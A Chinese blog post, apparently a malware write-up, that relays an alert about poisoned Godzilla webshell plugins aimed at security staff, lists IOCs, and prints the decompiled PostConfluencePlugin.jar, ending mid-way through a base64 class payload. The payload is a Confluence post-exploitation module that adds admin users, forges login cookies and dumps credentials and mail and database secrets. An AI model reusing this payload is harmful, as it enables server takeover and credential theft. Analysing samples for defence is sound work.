恶意样本分析初探

First Post:

Last Update:

恶意样本分析初探

前情提要

各单位:
近期收到一起物联网上报的外部情报,攻击者通过在Github项目中上传包含恶意jar包的哥斯拉插件,定向投毒安全从业人员,请各单位及时内部预警,同时以此为案例加强演练期间员工的安全意识,不要随意使用未经验证的软件和程序。
相关的恶意IP和文件哈希请加入安全设备进行监测拦截,同时排查近4个月内是否存在相关IP通联和文件落地情况,如发生安全事件请立即上报。

IOC:
206.206.78.190
104.36.229.104
e4a42e19578161210d7eb08ed88e44d6fba2db24f097e0fb5f5c9c9c93e5f0a2
cd0660e394120bd58011b11a1dfddae85a25c5c29de4ee05d

样本分析

PostConfluencePlugin.jar

直接扔进jadx里

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
package shells.plugins.postconfluence;

import java.util.Base64;
import java.util.Map;

/* loaded from: PostConfluencePlugin.jar:shells/plugins/postconfluence/PostConfluenceProxy.classs */
public class PostConfluenceProxy extends ClassLoader {
private static Class postConfluenceClass = null;
private static String postConfluenceClassBase64 = "yv66vgAAADQDOgoAFAGRBwGSCQEfAZMLADgBlAgBlQcBlggBlwoABgGYCgAGAZkHAZoKAAoBkQgBmwoBnAGdBwGeCAGfBwGgCgAKAaELABABoggBowcBpAsADgGlCAGmCwGnAagLAacBqQoAIgGqCgGrAawHAa0KABsBkQoAGwGuCAGvCgAbAbAIAbEHAbIHAbMIAbQIAbULACEBtgsAIQG3CAG4CAG5BwG6CAG7BwG8CAG9BwG+CAG/BwHACwAhAcELAVgBwgcBwwoAMgGRBwHECgA0AcULAVkBxgsBWQHHBwHICwApAckIAcoKADQBywgBzAsAOAHNCAHOCwA4Ac8LAVoB0AsBWgGUCwAvAdEIAdIKAdMB1AoB1QHWCgHTAdcHAdgIAdkIAdoLACsB2wgB3AgB3QgB3ggB3wgB4AgB4QgB4ggB4wsALQHkCAHlCwHmAecKAegB6QgB6gsB5gHrCAHsCwHmAe0KAR8B7ggB7wsB5gHwCAHxCgHyAfMIAfQLAVoB9QgB9gsAIQH3CwFhAfgKAfkB+goANAH7CgA0AfwKADIB/QoAIgH+CAH/CAIABwIBCwBsAgILAWECAwsBYQIEBwIFCAIGCwBwAZQLAHACBwsAcAIICwBwAgkLAHACCgsAcAILCwBwAgwLAHACDQsAcAIOCwBsAg8HAhALAHwBlAsAfAIHCwB8AggLAHwCCQsAfAIKCwB8AgsLAHwCDAsAfAINCwB8Ag4IAhEHAhIIAhMHAhQLAIcCFQcCFgsBYQIXBwFrCAIYCAIZCgCLAZQKAIsCGgoAiwIbCgCLAhwKAR8CHQoAiwIeCgCLAh8KAIsCIAsAiQIhBwIiBwFoCAIjCgCZAiQKAJkCGgoAmQIbCgCZAiUHAiYKAJkCHAoAmQIfCgCZAh4KAJkCJwoAmQIgCgCZAigHAikHAWYIAioKAKcCKwoApwIaCgCnAhsKAKcCJQoApwIcCgCnAh8KAKcCHgoApwInCgCnAiALACECLAgCLQsAIQIuCAIvCAIwBwIxCAIyCgAbAZgKALgCMwoBdgI0CwF3AjULAXcCNggCNwoBdgI4CAI5BwI6BwI7CgDDAZgKAjwCPQcCPgkCPwJACgDGAkEKAYoCQgcCQwoAygJECAJFBwJGCAJHCAJICwApAkkLACkCSggCSwoCTAJNCAJOCwDNAk8KAkwCUAcCUQoA1wJSBwJTCgJUAlUKANkCVgcCVwsA3AJYCwFhAcIHAlkIAloLAN8CWwgCXAsA3wIbCAJdCwDfAl4IAl8LAN8CGggCYAsA3wJhCAJiCwDfAh8IAmMLAN8CZAgCZQsA3wIgCwDfAmYKACICZwoAIgJoCAJpCgAiAmoIAmsIAmwKACICbQgCbggCbwgCcAgCcQgCcgsA3AJzCgAbAnQLAAICdQcCdgoAIgJ3CAJ4CAJ5CgEfAnoIAnsIAnwIAn0IAn4KACICfwgBeAoAIgKACAE2CAFsCAFiCAFACAFDCAFxCAFbCgEfAoEKAR8CggoBHwKDCgEfAoQKAR8ChQoBHwKGCgEfAocKAR8CiAgCiQoAIgKKCwACAosKABQBsAcCjAEACnBhcmFtZXRlcnMBAA9MamF2YS91dGlsL01hcDsBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAFkxQb3N0Q29uZmx1ZW5jZVBsdWdpbjsBAAZlcXVhbHMBABUoTGphdmEvbGFuZy9PYmplY3Q7KVoBAAR2YXIxAQASTGphdmEvbGFuZy9PYmplY3Q7AQANU3RhY2tNYXBUYWJsZQEAC2dldFVzZXJOYW1lAQAtKExjb20vYXRsYXNzaWFuL3VzZXIvVXNlcjspTGphdmEvbGFuZy9TdHJpbmc7AQAZTGNvbS9hdGxhc3NpYW4vdXNlci9Vc2VyOwEACmRhdGVGb3JtYXQBACQoTGphdmEvdXRpbC9EYXRlOylMamF2YS9sYW5nL1N0cmluZzsBAAR2YXIyAQAcTGphdmEvdGV4dC9TaW1wbGVEYXRlRm9ybWF0OwEAEExqYXZhL3V0aWwvRGF0ZTsBABJhZGRSZW1lbWJlck1lVG9rZW4BACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwEAEkxqYXZhL2xhbmcvU3RyaW5nOwEASUxjb20vYXRsYXNzaWFuL3NlcmFwaC9zZXJ2aWNlL3JlbWVtYmVybWUvRGVmYXVsdFJlbWVtYmVyTWVUb2tlbkdlbmVyYXRvcjsBAAR2YXIzAQA9TGNvbS9hdGxhc3NpYW4vc2VyYXBoL3NwaS9yZW1lbWJlcm1lL1JlbWVtYmVyTWVDb25maWd1cmF0aW9uOwEABHZhcjQBADhMY29tL2F0bGFzc2lhbi9zZXJhcGgvc3BpL3JlbWVtYmVybWUvUmVtZW1iZXJNZVRva2VuRGFvOwEABHZhcjUBADlMY29tL2F0bGFzc2lhbi9zZXJhcGgvc2VydmljZS9yZW1lbWJlcm1lL1JlbWVtYmVyTWVUb2tlbjsBAAxhZGRBZG1pblVzZXIBAEooTGphdmEvbGFuZy9TdHJpbmc7TGphdmEvbGFuZy9TdHJpbmc7TGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwEALExjb20vYXRsYXNzaWFuL2NvbmZsdWVuY2UvdXNlci9Vc2VyQWNjZXNzb3I7AQAMZ2V0VXNlckluZm9zAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAV2YXIxMgEANUxjb20vYXRsYXNzaWFuL2Nyb3dkL2VtYmVkZGVkL2FwaS9QYXNzd29yZENyZWRlbnRpYWw7AQAFdmFyMTQBADNMY29tL2F0bGFzc2lhbi9jb25mbHVlbmNlL3NlY3VyaXR5L2xvZ2luL0xvZ2luSW5mbzsBAAV2YXIxMAEABXZhcjExAQAnTGNvbS9hdGxhc3NpYW4vY3Jvd2QvZW1iZWRkZWQvYXBpL1VzZXI7AQAvTGNvbS9hdGxhc3NpYW4vY3Jvd2QvZW1iZWRkZWQvYXBpL0Nyb3dkU2VydmljZTsBADJMY29tL2F0bGFzc2lhbi9jb25mbHVlbmNlL3VzZXIvVXNlckRldGFpbHNNYW5hZ2VyOwEANkxjb20vYXRsYXNzaWFuL2NvbmZsdWVuY2Uvc2VjdXJpdHkvbG9naW4vTG9naW5NYW5hZ2VyOwEAKkxjb20vYXRsYXNzaWFuL2Nyb3dkL2VtYmVkZGVkL3NwaS9Vc2VyRGFvOwEABHZhcjYBACZMY29tL2F0bGFzc2lhbi91c2VyL3NlYXJjaC9wYWdlL1BhZ2VyOwEABHZhcjcBABRMamF2YS91dGlsL0l0ZXJhdG9yOwEABHZhcjgBAB9MamF2YS9pby9CeXRlQXJyYXlPdXRwdXRTdHJlYW07AQAEdmFyOQEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwcCjQcCjgcCjwEADmdldE1haWxTZXJ2ZXJzAQApTGNvbS9hdGxhc3NpYW4vbWFpbC9zZXJ2ZXIvUG9wTWFpbFNlcnZlcjsBAAFJAQAqTGNvbS9hdGxhc3NpYW4vbWFpbC9zZXJ2ZXIvU01UUE1haWxTZXJ2ZXI7AQAtTGNvbS9hdGxhc3NpYW4vbWFpbC9zZXJ2ZXIvTWFpbFNlcnZlck1hbmFnZXI7AQAQTGphdmEvdXRpbC9MaXN0OwcCkAEAC2dldEFsbFNwYWNlAQAFdmFyMTMBACtMY29tL2F0bGFzc2lhbi9jb25mbHVlbmNlL3BhZ2VzL0F0dGFjaG1lbnQ7AQAlTGNvbS9hdGxhc3NpYW4vY29uZmx1ZW5jZS9wYWdlcy9QYWdlOwEALFtMY29tL2F0bGFzc2lhbi9jb25mbHVlbmNlL3BhZ2VzL0F0dGFjaG1lbnQ7AQAnTGNvbS9hdGxhc3NpYW4vY29uZmx1ZW5jZS9zcGFjZXMvU3BhY2U7AQAmW0xjb20vYXRsYXNzaWFuL2NvbmZsdWVuY2UvcGFnZXMvUGFnZTsBAC5MY29tL2F0bGFzc2lhbi9jb25mbHVlbmNlL3NwYWNlcy9TcGFjZU1hbmFnZXI7AQAsTGNvbS9hdGxhc3NpYW4vY29uZmx1ZW5jZS9wYWdlcy9QYWdlTWFuYWdlcjsBAChbTGNvbS9hdGxhc3NpYW4vY29uZmx1ZW5jZS9zcGFjZXMvU3BhY2U7AQASdXBkYXRlVXNlclBhc3N3b3JkAQA4KExqYXZhL2xhbmcvU3RyaW5nO0xqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZzsBAC5MY29tL2F0bGFzc2lhbi9jb25mbHVlbmNlL3VzZXIvQ29uZmx1ZW5jZVVzZXI7BwKRAQAKRXhjZXB0aW9ucwEAEmdldEhpYmVybmF0ZUNvbmZpZwEAFkxqYXZhL3V0aWwvUHJvcGVydGllczsBABdMamF2YS91dGlsL0VudW1lcmF0aW9uOwEAKUxjb20vYXRsYXNzaWFuL2NvbmZpZy9kYi9IaWJlcm5hdGVDb25maWc7AQAZTGphdmEvbGFuZy9TdHJpbmdCdWlsZGVyOwcCkgcCkwEACnNlYXJjaFBhZ2UBAAV2YXIxNwEABXZhcjI0AQAVTGphdmEvbGFuZy9UaHJvd2FibGU7AQAFdmFyMjEBAAV2YXIyMAEABXZhcjE4AQAxTGNvbS9hdGxhc3NpYW4vY29uZmx1ZW5jZS9zZWFyY2gvdjIvU2VhcmNoUmVzdWx0OwEABXZhcjE5AQAFdmFyMjYBADBMY29tL2F0bGFzc2lhbi9jb25mbHVlbmNlL3NlYXJjaC92Mi9TZWFyY2hRdWVyeTsBADZMY29tL2F0bGFzc2lhbi9jb25mbHVlbmNlL3NlYXJjaC92Mi9zb3J0L01vZGlmaWVkU29ydDsBAFNMY29tL2F0bGFzc2lhbi9jb25mbHVlbmNlL3NlYXJjaC92Mi9zZWFyY2hmaWx0ZXIvU2l0ZVNlYXJjaFBlcm1pc3Npb25zU2VhcmNoRmlsdGVyOwEAMkxjb20vYXRsYXNzaWFuL2NvbmZsdWVuY2Uvc2VhcmNoL3YyL0NvbnRlbnRTZWFyY2g7AQAyTGNvbS9hdGxhc3NpYW4vY29uZmx1ZW5jZS9zZWFyY2gvdjIvU2VhcmNoTWFuYWdlcjsBAAV2YXIxNQEAKExjb20vYXRsYXNzaWFuL2Nyb3dkL2VtYmVkZGVkL2FwaS9Hcm91cDsBAAV2YXIxNgcClAcClQEAA2dldAEACHRvU3RyaW5nAQABQgEAClNvdXJjZUZpbGUBABlQb3N0Q29uZmx1ZW5jZVBsdWdpbi5qYXZhDAEiASMBAA1qYXZhL3V0aWwvTWFwDAEgASEMApYBRAEABG51bGwBABpqYXZhL3RleHQvU2ltcGxlRGF0ZUZvcm1hdAEAE3l5eXktTU0tZGQgSEg6bW06c3MMASIClwwCmAEyAQBHY29tL2F0bGFzc2lhbi9zZXJhcGgvc2VydmljZS9yZW1lbWJlcm1lL0RlZmF1bHRSZW1lbWJlck1lVG9rZW5HZW5lcmF0b3IBABByZW1lbWJlck1lQ29uZmlnBwKZDAKaApsBADtjb20vYXRsYXNzaWFuL3NlcmFwaC9zcGkvcmVtZW1iZXJtZS9SZW1lbWJlck1lQ29uZmlndXJhdGlvbgEAEnJlbWVtYmVyTWVUb2tlbkRhbwEANmNvbS9hdGxhc3NpYW4vc2VyYXBoL3NwaS9yZW1lbWJlcm1lL1JlbWVtYmVyTWVUb2tlbkRhbwwCnAKdDAKeAp8BAChzdWNjZXNzZnVsbHkgYWRkZWQhIFlvdSBDb29raWUgaXMNCiVzOiVzAQAQamF2YS9sYW5nL09iamVjdAwCoAFEAQAFJXM6JXMHAqEMAqICowwCpAFEDAKYAqUHAqYMAqcBNwEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDAKoAqkBAAxAZXhhbXBsZS5jb20MAY0BRAEADHVzZXJBY2Nlc3NvcgEAKmNvbS9hdGxhc3NpYW4vY29uZmx1ZW5jZS91c2VyL1VzZXJBY2Nlc3NvcgEAEGphdmEvbGFuZy9TdHJpbmcBABljb25mbHVlbmNlLWFkbWluaXN0cmF0b3JzAQAQY29uZmx1ZW5jZS11c2VycwwCqgKrDAKsAq0BABdzdWNjZXNzZnVsbHkgYWRkZWQgdXNlcgEADGNyb3dkU2VydmljZQEALWNvbS9hdGxhc3NpYW4vY3Jvd2QvZW1iZWRkZWQvYXBpL0Nyb3dkU2VydmljZQEAEnVzZXJEZXRhaWxzTWFuYWdlcgEAMGNvbS9hdGxhc3NpYW4vY29uZmx1ZW5jZS91c2VyL1VzZXJEZXRhaWxzTWFuYWdlcgEADGxvZ2luTWFuYWdlcgEANGNvbS9hdGxhc3NpYW4vY29uZmx1ZW5jZS9zZWN1cml0eS9sb2dpbi9Mb2dpbk1hbmFnZXIBABRlbWJlZGRlZENyb3dkVXNlckRhbwEAKGNvbS9hdGxhc3NpYW4vY3Jvd2QvZW1iZWRkZWQvc3BpL1VzZXJEYW8MAq4CrwwCsAKxAQAdamF2YS9pby9CeXRlQXJyYXlPdXRwdXRTdHJlYW0BABNqYXZhL2lvL1ByaW50U3RyZWFtDAEiArIMArMCtAwCtQK2AQAXY29tL2F0bGFzc2lhbi91c2VyL1VzZXIMArcCuAEACHVzZXI6ICVzDAK5ApcBAA0JZnVsbE5hbWU6ICVzDAK6AUQBAAoJZW1haWw6ICVzDAK7AUQMArwCvQwCvgK/AQAoCWlzRW5jcnlwdGVkQ3JlZGVudGlhbDolcwljcmVkZW50aWFsOiAlcwcCwAwCwQK0BwLCDALDAsQMAr4BRAEAE2phdmEvbGFuZy9FeGNlcHRpb24BAAoJcGhvbmU6ICVzAQAFcGhvbmUMAsUCxgEABwlpbTogJXMBAAJpbQEADQlwb3NpdGlvbjogJXMBAAhwb3NpdGlvbgEADwlkZXBhcnRtZW50OiAlcwEACmRlcGFydG1lbnQBAA0JbG9jYXRpb246ICVzAQAIbG9jYXRpb24MAscCyAEAHAljdXJyZW50RmFpbGVkTG9naW5Db3VudDogJXMHAskMAsoCywcCzAwCwwLNAQAaCXRvdGFsRmFpbGVkTG9naW5Db3VudDogJXMMAs4CywEAGAlsYXN0RmFpbGVkTG9naW5EYXRlOiAlcwwCzwLQDAExATIBABwJbGFzdFN1Y2Nlc3NmdWxMb2dpbkRhdGU6ICVzDALRAtABABAJZGlyZWN0b3J5SWQ6ICVzBwLSDALDAtMBAA0JaXNBY3RpdmU6ICVzDALUArQBAAsJZ3JvdXBzOiAlcwwC1QLWDALXAtgHAtkMAY0C2gwC2wEjDALcASMMAt0C3gwBIgLfAQAMTWFpbFNlcnZlcnM6AQARbWFpbFNlcnZlck1hbmFnZXIBACtjb20vYXRsYXNzaWFuL21haWwvc2VydmVyL01haWxTZXJ2ZXJNYW5hZ2VyDALgAuEMAuICywwBjALjAQAnY29tL2F0bGFzc2lhbi9tYWlsL3NlcnZlci9Qb3BNYWlsU2VydmVyAQBtCW5hbWU6JXMgbWFpbFByb3RvY29sOiVzIGhvc3RuYW1lOiVzIHBvcnQ6JXMgdXNlcm5hbWU6JXMgcGFzc3dvcmQ6JXMgZGVzY3JpcHRpb246JXMgc29ja3NIb3N0OiVzIHNvY2tzUG9ydDolcwwC5ALlDALmAUQMAucBRAwC6AFEDALpAUQMAuoBRAwC6wFEDALsAUQMAu0C4QEAKGNvbS9hdGxhc3NpYW4vbWFpbC9zZXJ2ZXIvU01UUE1haWxTZXJ2ZXIBAAxzcGFjZU1hbmFnZXIBACxjb20vYXRsYXNzaWFuL2NvbmZsdWVuY2Uvc3BhY2VzL1NwYWNlTWFuYWdlcgEAC3BhZ2VNYW5hZ2VyAQAqY29tL2F0bGFzc2lhbi9jb25mbHVlbmNlL3BhZ2VzL1BhZ2VNYW5hZ2VyDALuAuEBACVjb20vYXRsYXNzaWFuL2NvbmZsdWVuY2Uvc3BhY2VzL1NwYWNlDALXAu8BAAlBbGxTcGFjZToBAHIJc3BhY2VOYW1lOiAlcyBjcmVhdGlvbkRhdGU6JXMgZGlzcGxheVRpdGxlOiVzIGNyZWF0b3I6JXMgbGFzdE1vZGlmaWVyOiVzIGxhc3RNb2RpZmljYXRpb25EYXRlOiVzIHNwYWNlVXJsUGF0aDogJXMMAvAC0AwC8QFEDALyAvMMAS4BLwwC9ALzDAL1AtAMAvYBRAwC9wL4AQAjY29tL2F0bGFzc2lhbi9jb25mbHVlbmNlL3BhZ2VzL1BhZ2UBAI8JCXBhZ2VOYW1lOiVzIGNyZWF0aW9uRGF0ZTolcyBkaXNwbGF5VGl0bGU6JXMgbGFiZWxzOiVzIGNyZWF0b3I6JXMgbGFzdE1vZGlmaWNhdGlvbkRhdGU6JXMgbGFzdE1vZGlmaWVyVXNlcjolcyBjb21tZW50Q291bnQ6JXMgc3BhY2VVcmxQYXRoOiAlcwwC+QFEDAL6AuEBACVjb20vYXRsYXNzaWFuL2NvbmZsdWVuY2UvbGFiZWxzL0xhYmVsDAL7AuEMAvwC4QEAKWNvbS9hdGxhc3NpYW4vY29uZmx1ZW5jZS9wYWdlcy9BdHRhY2htZW50AQCWCQkJYXR0YWNobWVudE5hbWU6JXMgY3JlYXRpb25EYXRlOiVzIGRpc3BsYXlUaXRsZTolcyBsYWJlbHM6JXMgY3JlYXRvcjolcyBsYXN0TW9kaWZpY2F0aW9uRGF0ZTolcyBsYXN0TW9kaWZpZXJVc2VyOiVzIGNvbW1lbnRDb3VudDolcyBzcGFjZVVybFBhdGg6ICVzDAL9AUQMAv4C/wEAF1RoaXMgdXNlciB3YXMgbm90IGZvdW5kDAMAAwEBAB1QYXNzd29yZCBjaGFuZ2VkIHN1Y2Nlc3NmdWxseQEAD2hpYmVybmF0ZUNvbmZpZwEAJ2NvbS9hdGxhc3NpYW4vY29uZmlnL2RiL0hpYmVybmF0ZUNvbmZpZwEAEmhpYmVybmF0ZUNvbmZpZzoNCgwDAgMDDAMEAwUMAwYCtAwDBwK2AQAICSVzOiAlcwoMAwgBNwEABgludWxsCgEALmNvbS9hdGxhc3NpYW4vY29uZmx1ZW5jZS9zZWFyY2gvdjIvU2VhcmNoUXVlcnkBADJjb20vYXRsYXNzaWFuL2NvbmZsdWVuY2Uvc2VhcmNoL3YyL3F1ZXJ5L1RleHRRdWVyeQcDCQwDCgMLAQA0Y29tL2F0bGFzc2lhbi9jb25mbHVlbmNlL3NlYXJjaC92Mi9zb3J0L01vZGlmaWVkU29ydAcDDQwDEAMRDAEiAxIMAxMDFAEAMGNvbS9hdGxhc3NpYW4vY29uZmx1ZW5jZS9zZWFyY2gvdjIvQ29udGVudFNlYXJjaAwBIgMVAQANc2VhcmNoTWFuYWdlcgEAMGNvbS9hdGxhc3NpYW4vY29uZmx1ZW5jZS9zZWFyY2gvdjIvU2VhcmNoTWFuYWdlcgEACmNvbmRpdGlvbjoBAAZwYWdlczoMAxYDFwwDGAMZAQAfTm8gdXNlciB3aXRoIGFkbWluIHJpZ2h0cyBmb3VuZAcDGgwDGwKtAQARZm91bmQgYWRtaW4gdXNlciAMAxwDHQwDHgEjAQATamF2YS9sYW5nL1Rocm93YWJsZQwDHwMgAQA3Y29tL2F0bGFzc2lhbi9jb25mbHVlbmNlL3NlYXJjaC92Mi9EZWZhdWx0U2VhcmNoUmVzdWx0cwcDIQwDIgLhDAEiAyMBADBjb20vYXRsYXNzaWFuL2NvbmZsdWVuY2Uvc2VhcmNoL3YyL1NlYXJjaFJlc3VsdHMMAyQC4QEAL2NvbS9hdGxhc3NpYW4vY29uZmx1ZW5jZS9zZWFyY2gvdjIvU2VhcmNoUmVzdWx0AQAMCXNwYWNlTmFtZTogDAMlAUQBAAkJCXRpdGxlOiABAA8JCWNyZWF0b3JVc2VyOiAMAyYC8wEAEAkJY3JlYXRpb25EYXRlOiABABQJCWxhc3RNb2RpZmllclVzZXI6IAwDJwLzAQAYCQlsYXN0TW9kaWZpY2F0aW9uRGF0ZTogAQAMCQlzcGFjZUtleTogDAMoAUQBAAsJCXVybFBhdGg6IAwDKQFEDAMqAysMAywCywEACwkJY29udGVudDogDAMtAy4BAAENAQACXHIMAy8DMAEAAQoBAAJcbgEAAQkBAAABABlUb3RhbCBudW1iZXIgb2YgcmVzdWx0czogDAMxAssMAqgDMgwBjAMzAQACW0IMAsMDNAEACm5vdCByZXN1bHQBAAptZXRob2ROYW1lDAGMATcBAAh1c2VybmFtZQEACHBhc3N3b3JkAQAFZW1haWwBAAljb25kaXRpb24MAzUCywwBKQEqDAE2ATcMAUABQQwBQwFEDAFbAUQMAWIBRAwBbAFtDAFxAUQMAXgBNwEABnJlc3VsdAwDNgLeDAM3AzgBABRQb3N0Q29uZmx1ZW5jZVBsdWdpbgEAJGNvbS9hdGxhc3NpYW4vdXNlci9zZWFyY2gvcGFnZS9QYWdlcgEAEmphdmEvdXRpbC9JdGVyYXRvcgEAJWNvbS9hdGxhc3NpYW4vY3Jvd2QvZW1iZWRkZWQvYXBpL1VzZXIBAA5qYXZhL3V0aWwvTGlzdAEALGNvbS9hdGxhc3NpYW4vY29uZmx1ZW5jZS91c2VyL0NvbmZsdWVuY2VVc2VyAQAUamF2YS91dGlsL1Byb3BlcnRpZXMBABVqYXZhL3V0aWwvRW51bWVyYXRpb24BAFFjb20vYXRsYXNzaWFuL2NvbmZsdWVuY2Uvc2VhcmNoL3YyL3NlYXJjaGZpbHRlci9TaXRlU2VhcmNoUGVybWlzc2lvbnNTZWFyY2hGaWx0ZXIBACZjb20vYXRsYXNzaWFuL2Nyb3dkL2VtYmVkZGVkL2FwaS9Hcm91cAEAB2dldE5hbWUBABUoTGphdmEvbGFuZy9TdHJpbmc7KVYBAAZmb3JtYXQBAC9jb20vYXRsYXNzaWFuL3NwcmluZy9jb250YWluZXIvQ29udGFpbmVyTWFuYWdlcgEADGdldENvbXBvbmVudAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9PYmplY3Q7AQANZ2VuZXJhdGVUb2tlbgEATShMamF2YS9sYW5nL1N0cmluZzspTGNvbS9hdGxhc3NpYW4vc2VyYXBoL3NlcnZpY2UvcmVtZW1iZXJtZS9SZW1lbWJlck1lVG9rZW47AQAEc2F2ZQEAdChMY29tL2F0bGFzc2lhbi9zZXJhcGgvc2VydmljZS9yZW1lbWJlcm1lL1JlbWVtYmVyTWVUb2tlbjspTGNvbS9hdGxhc3NpYW4vc2VyYXBoL3NlcnZpY2UvcmVtZW1iZXJtZS9SZW1lbWJlck1lVG9rZW47AQANZ2V0Q29va2llTmFtZQEAN2NvbS9hdGxhc3NpYW4vc2VyYXBoL3NlcnZpY2UvcmVtZW1iZXJtZS9SZW1lbWJlck1lVG9rZW4BAAVnZXRJZAEAEigpTGphdmEvbGFuZy9Mb25nOwEAD2dldFJhbmRvbVN0cmluZwEAOShMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvU3RyaW5nOwEAE2phdmEvbmV0L1VSTEVuY29kZXIBAAZlbmNvZGUBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAdhZGRVc2VyAQB2KExqYXZhL2xhbmcvU3RyaW5nO0xqYXZhL2xhbmcvU3RyaW5nO0xqYXZhL2xhbmcvU3RyaW5nO0xqYXZhL2xhbmcvU3RyaW5nO1tMamF2YS9sYW5nL1N0cmluZzspTGNvbS9hdGxhc3NpYW4vdXNlci9Vc2VyOwEACHNhdmVVc2VyAQAcKExjb20vYXRsYXNzaWFuL3VzZXIvVXNlcjspVgEACGdldFVzZXJzAQAoKClMY29tL2F0bGFzc2lhbi91c2VyL3NlYXJjaC9wYWdlL1BhZ2VyOwEACGl0ZXJhdG9yAQAWKClMamF2YS91dGlsL0l0ZXJhdG9yOwEAGShMamF2YS9pby9PdXRwdXRTdHJlYW07KVYBAAdoYXNOZXh0AQADKClaAQAEbmV4dAEAFCgpTGphdmEvbGFuZy9PYmplY3Q7AQAHZ2V0VXNlcgEAOyhMamF2YS9sYW5nL1N0cmluZzspTGNvbS9hdGxhc3NpYW4vY3Jvd2QvZW1iZWRkZWQvYXBpL1VzZXI7AQAHcHJpbnRsbgEAC2dldEZ1bGxOYW1lAQAIZ2V0RW1haWwBAA5nZXREaXJlY3RvcnlJZAEAAygpSgEADWdldENyZWRlbnRpYWwBAEooSkxqYXZhL2xhbmcvU3RyaW5nOylMY29tL2F0bGFzc2lhbi9jcm93ZC9lbWJlZGRlZC9hcGkvUGFzc3dvcmRDcmVkZW50aWFsOwEAM2NvbS9hdGxhc3NpYW4vY3Jvd2QvZW1iZWRkZWQvYXBpL1Bhc3N3b3JkQ3JlZGVudGlhbAEAFWlzRW5jcnlwdGVkQ3JlZGVudGlhbAEAEWphdmEvbGFuZy9Cb29sZWFuAQAHdmFsdWVPZgEAFihaKUxqYXZhL2xhbmcvQm9vbGVhbjsBABFnZXRTdHJpbmdQcm9wZXJ0eQEAPyhMY29tL2F0bGFzc2lhbi91c2VyL1VzZXI7TGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwEADGdldExvZ2luSW5mbwEATihMY29tL2F0bGFzc2lhbi91c2VyL1VzZXI7KUxjb20vYXRsYXNzaWFuL2NvbmZsdWVuY2Uvc2VjdXJpdHkvbG9naW4vTG9naW5JbmZvOwEAMWNvbS9hdGxhc3NpYW4vY29uZmx1ZW5jZS9zZWN1cml0eS9sb2dpbi9Mb2dpbkluZm8BABpnZXRDdXJyZW50RmFpbGVkTG9naW5Db3VudAEAAygpSQEAEWphdmEvbGFuZy9JbnRlZ2VyAQAWKEkpTGphdmEvbGFuZy9JbnRlZ2VyOwEAGGdldFRvdGFsRmFpbGVkTG9naW5Db3VudAEAFmdldExhc3RGYWlsZWRMb2dpbkRhdGUBABIoKUxqYXZhL3V0aWwvRGF0ZTsBABpnZXRMYXN0U3VjY2Vzc2Z1bExvZ2luRGF0ZQEADmphdmEvbGFuZy9Mb25nAQATKEopTGphdmEvbGFuZy9Mb25nOwEACGlzQWN0aXZlAQANZ2V0R3JvdXBOYW1lcwEAKyhMY29tL2F0bGFzc2lhbi91c2VyL1VzZXI7KUxqYXZhL3V0aWwvTGlzdDsBAAd0b0FycmF5AQAVKClbTGphdmEvbGFuZy9PYmplY3Q7AQAQamF2YS91dGlsL0FycmF5cwEAJyhbTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvU3RyaW5nOwEABWZsdXNoAQAFY2xvc2UBAAt0b0J5dGVBcnJheQEABCgpW0IBAAUoW0IpVgEAEWdldFBvcE1haWxTZXJ2ZXJzAQASKClMamF2YS91dGlsL0xpc3Q7AQAEc2l6ZQEAFShJKUxqYXZhL2xhbmcvT2JqZWN0OwEAD2dldE1haWxQcm90b2NvbAEAIygpTGNvbS9hdGxhc3NpYW4vbWFpbC9NYWlsUHJvdG9jb2w7AQALZ2V0SG9zdG5hbWUBAAdnZXRQb3J0AQALZ2V0VXNlcm5hbWUBAAtnZXRQYXNzd29yZAEADmdldERlc2NyaXB0aW9uAQAMZ2V0U29ja3NIb3N0AQAMZ2V0U29ja3NQb3J0AQASZ2V0U210cE1haWxTZXJ2ZXJzAQAMZ2V0QWxsU3BhY2VzAQAoKFtMamF2YS9sYW5nL09iamVjdDspW0xqYXZhL2xhbmcvT2JqZWN0OwEAD2dldENyZWF0aW9uRGF0ZQEAD2dldERpc3BsYXlUaXRsZQEACmdldENyZWF0b3IBADAoKUxjb20vYXRsYXNzaWFuL2NvbmZsdWVuY2UvdXNlci9Db25mbHVlbmNlVXNlcjsBAA9nZXRMYXN0TW9kaWZpZXIBABdnZXRMYXN0TW9kaWZpY2F0aW9uRGF0ZQEACmdldFVybFBhdGgBAAhnZXRQYWdlcwEAOihMY29tL2F0bGFzc2lhbi9jb25mbHVlbmNlL3NwYWNlcy9TcGFjZTtaKUxqYXZhL3V0aWwvTGlzdDsBAAhnZXRUaXRsZQEACWdldExhYmVscwEAC2dldENvbW1lbnRzAQAOZ2V0QXR0YWNobWVudHMBAAtnZXRGaWxlTmFtZQEADWdldFVzZXJCeU5hbWUBAEIoTGphdmEvbGFuZy9TdHJpbmc7KUxjb20vYXRsYXNzaWFuL2NvbmZsdWVuY2UvdXNlci9Db25mbHVlbmNlVXNlcjsBAA1hbHRlclBhc3N3b3JkAQAuKExjb20vYXRsYXNzaWFuL3VzZXIvVXNlcjtMamF2YS9sYW5nL1N0cmluZzspVgEAFmdldEhpYmVybmF0ZVByb3BlcnRpZXMBABgoKUxqYXZhL3V0aWwvUHJvcGVydGllczsBAARrZXlzAQAZKClMamF2YS91dGlsL0VudW1lcmF0aW9uOwEAD2hhc01vcmVFbGVtZW50cwEA